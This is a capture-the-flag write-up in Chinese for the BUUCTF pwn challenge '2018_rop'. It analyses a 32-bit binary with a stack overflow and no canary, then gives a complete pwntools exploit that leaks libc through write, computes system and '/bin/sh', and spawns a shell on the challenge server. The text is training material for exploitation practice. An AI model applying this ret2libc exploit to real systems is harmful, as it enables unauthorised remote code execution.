BUUCTF-PWN-铁人三项(第五赛区)_2018_rop
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
32位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接
ida看源码
read函数输入0x100字节,而buf只有0x88字节,存在栈溢出
buf距离返回地址0x88+0x4字节
观察程序没有后门函数,但存在write函数,可以利用write函数泄露函数运行时的真实地址,从而获得libc版本,根据相对偏移不变的原则,可以得到system函数和字符串/bin/sh地址,再利用栈溢出调用system(“/bin/sh”),获得shell
exp
from pwn import *
from LibcSearcher import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'i386')
sh = remote('node4.buuoj.cn',28009)
elf = ELF('./2018_rop')
main_addr = elf.symbols['main']
write_plt_addr = elf.plt['write']
write_got_addr = elf.got['write']
payload = flat(['a' * (0x88 + 0x4),write_plt_addr,main_addr,1,write_got_addr,4])
sh.sendline(payload)
write_addr = u32(sh.recv())
print(hex(write_addr))
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
payload = flat(['a' * (0x88 + 0x4),system_addr,'b' * 4,bin_sh_addr])
sh.sendline(payload)
sh.interactive()
运行获得flag